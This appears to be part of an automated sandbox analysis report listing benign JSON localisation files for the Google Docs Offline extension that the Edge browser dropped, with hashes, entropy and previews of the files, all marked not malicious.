                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
